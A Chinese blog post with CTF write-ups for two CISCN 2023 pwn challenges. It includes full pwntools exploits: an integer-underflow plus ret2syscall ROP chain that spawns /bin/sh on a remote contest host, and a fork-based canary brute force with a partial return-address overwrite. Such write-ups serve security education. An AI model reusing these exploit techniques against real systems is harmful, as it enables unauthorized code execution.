CISCN2023初赛pwn

最新推荐文章于 2024-01-31 11:54:17 发布
最新推荐文章于 2024-01-31 11:54:17 发布
阅读量302 收藏
点赞数
分类专栏: ctfaaaaaaaa 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51627915/article/details/130926206
版权

1、27日_烧烤摊儿

checksec:

在这里插入图片描述

ida查看:

main函数查看会发现,虽然开了canary,但是并没有设置,也就是说,可以直接栈溢出

在这里插入图片描述

查看反汇编:

在这里插入图片描述

没有什么特别,查看pijiu函数的反汇编:

在这里插入图片描述

发现可以卡bug:输入负数,就可以是的money增加,同时买下摊位,就可以进入关键函数:gaiming:

在这里插入图片描述

这里可以看出,不仅可以栈溢出,还可以把内容复制到name这个全局变量上(也就是可以把binsh字段放上)。

这道题是静态编译,也就是没有libc,因此需要用到syscall。需要用到的寄存器:

在这里插入图片描述

在这里插入图片描述

exp:

from pwn import*
context(os='linux', arch='amd64')
context.log_level = 'debug'

# p=process('./shaokao')
p=remote('123.56.99.60',16862)
elf=ELF('./shaokao')
money=0x04E60F8
name=0x04E60F0
int_0x80=0x04aa6e0
syscall_addr=0x004230a6

p.recvuntil('来点啥?\n')
p.sendline(b'1')
p.recvuntil('勇闯天涯\n')
p.sendline(b'1')
p.recvuntil('来几瓶?\n')
p.sendline(b'-20000')

p.recvuntil('来点啥?\n')
p.sendline(b'4')
p.recvuntil('来点啥?\n')

p.sendline(b'5')
p.recvuntil('请赐名:\n')
# gdb.attach(p)
# pause()
pop_abd_ret=0x04a404a
pop_rsi=0x040a67e
pop_rdi=0x040264f
# p.sendline(b'a'*0x18)
payload=b'/bin/sh\x00'.ljust(0x28,b'\x00')+p64(pop_abd_ret)+p64(0x3b)+p64(0)+p64(0)
payload+=p64(pop_rsi)+p64(0)+p64(pop_rdi)+p64(name)
payload+=p64(syscall_addr)
p.sendline(payload)
# p.recvuntil('欢迎来到')
# addr1=u64(p.recv()[:3].ljust(8,b'\x00'))
# print('addr1_is:',hex(addr1)) #0x40bf60


p.interactive()

flag值:

flag{90d2436c-9ee5-4473-b363-f0db52c2525d}

2、funcanary

checksec:

在这里插入图片描述

ida查看main函数,发现在循环,并且还是fork循环。因为开了canary保护,所以可以考虑利用fork循环爆破出canary:

在这里插入图片描述

跟进中间的函数,发现只是一个read函数,并且可以栈溢出:

在这里插入图片描述

又发现了一个关键函数:

在这里插入图片描述

因为开了地址随机化,程序的后三位是固定的,因此我们只需要爆破出第四位就可以了。这一题主打的就是爆破。

exp:

from pwn import*
context(os='linux', arch='amd64')
context.log_level = 'debug'

p=process('./funcanary')
# p=remote('39.106.84.217',42158)
canary='\x00'
p.recvuntil(b'welcome\n')
for j in range(7):
	for i in range(0x100):
		# p.recvuntil(b'welcome\n')
		payload='a'*0x68+canary+chr(i)
		p.send(payload)
		respond=p.recvuntil(b'welcome\n')
		print('respond_is:',respond)
		if b'have fun\n' in respond:
			canary += chr(i)
			break
# pause()
print('canary_is:',hex(u64(canary)))
print(len(canary))
print(type(u64(canary)))

canary=hex(u64(canary))
canary=int(canary,16)
p.send(b'ok')
for i in range(0x10):
	guess=chr(i*0x10+2).encode('utf-8')
	payload=b'b'*0x68+p64(canary)+p64(0xdeadbeefdeadbeef)
	payload+=b'\x31'+guess
	p.send(payload)
	flag = p.recvuntil('welcome\n')
	if 'flag' in flag:
		break
print('flag_is:',flag)
p.interactive()

flag值:

flag{ecb5a4ae-b39f-4d20-9acf-c71861f7cc5c}

亚撒西带师
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 9279
2023全国大学生信息安全竞赛(ciscn)部分题解
ciscn2023_烧烤摊儿 wp(python3)
Kata_Jhin的博客
05-29 544
ciscn2023_烧烤摊儿(python3)wp
NSSCTF逆向刷题记录
fivesheeptree的博客
07-26 1724
pyc在线反编译已知 pqec求m,套用密码学模板。
2022国赛Re1 baby_tree
weixin_45930050的博客
05-30 906
2022国赛Reverse第一题
PWN · ret2syscall】[CISCN 2023 初赛]烧烤摊儿
Mr_Fmnwon的博客
01-31 439
1、整数溢出增加money2、“购买店铺”到漏洞点3、构造payload:b’/bin/sh\x00’+padding+ret2syscall即可
ciscn2023初赛 writeup
S4n_v1的博客
05-28 2793
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wp。 pwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
Reverse
nareku的博客
10-08 375
入门简单写写
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 490
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
pwn】[CISCN 2023 初赛]funcanary --爆破canary和pie
question55的博客
11-14 186
拿到程序先查一下保护状态可以发现保护全开,再看一下程序的逻辑可以发现,这里有一个fork函数:C语言中的fork()函数用于创建一个新的进程,该进程是原始进程(父进程)的一个副本。这个副本将从fork()函数之后的代码行开始执行,父进程和子进程在此处分别继续执行不同的代码。fork()函数的返回值有以下三种可能情况:如果返回-1,表示创建新进程失败。 如果返回0,表示当前进程是子进程。 如果返回一个正整数,表示当前进程是父进程,返回的整数是子进程的进程ID。就算说fork函数会开启一个子进程,然后根据whi
【CTF】2023Ciscn WEB方向题解
Sapphire037的博客
05-29 2298
比赛体验一般,一黑灯基本上题都烂掉。
CISCN 2023 初赛 pwn——Shellwego 题解
CoLin的pwn小屋
05-28 1800
CISCN 2023 初赛 pwn Shellwego题解
[CISCN 2023 初赛]Sign_in_passwd 被加密的生产流量 题目复现
2201_75327657的博客
06-14 619
且观察第二行的密钥发现带有百分号%大胆推测可能是url编码后的密钥。且有等号大概就是base32加密只需要去在线解码一下答案就出来了。已知是流量分析题先把题目拉入wireshark中。base64多了小写字母,0,1,8,9以及+/通过做题经验与交流猜测大概第一行是加密后的代码。首先根据经验看看是否flag存在于TCP流中。1.下载压缩包后用文本的形式打开他给的文件。此时又去复习了下base64和32的区别。那我们可以去试一试先还原密钥。只需要再进行一下base64。打开后发现确实有东西。
funcanary[CISCN2023初赛]-爆破canary+pie
qq_53928256的博客
05-29 743
根据PIE的保护的特性我们可以知道(请先进行PIE保护的相关学习),地址的后3位是不变的,所以只需要的原先返回地址的基础之上将返回地址的后三位覆盖位system(“/bin/cat flag”)函数调用的地址即可,即为修改为“0x231”(该地址只需要在IDA看偏移地址即可),根据“字符”查找到特殊的字符串“/bin/cat flag”,所以可能存在直接的system(“/bin/cat flag”)函数,通过追踪定位,发现确实存在相应函数。先检查文件的保护以及文件的类型,保护全开,64位程序。
[CISCN 2023 初赛]puzzle 解析
qq_73722777的博客
06-16 891
猜测部分图片的高度被修改与出题人的意图有关。于是,我们可以通过坐标+图片分辨率的方式(在得到最后一块拼图的坐标后,将其与它的分辨率大小相加)就能得到原图片的大小。考虑到bmp文件特性,bmp是按⾏绘制的,每⾏数据都需要为4的倍数,当像素数据不满⾜这个条件时,会⾃动。而在这道题中出题人很明显修改了这个填充的值,我们需要把这个值按照拼图的排列方式提取出来。tmp类型的拼图,因为tmp文件特性在文件头的位置会有其在原图片上的位置坐标。需要注意的是,部分图片给的高度参数是负数,这样会导致拼出来的图片会颠倒过来。
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值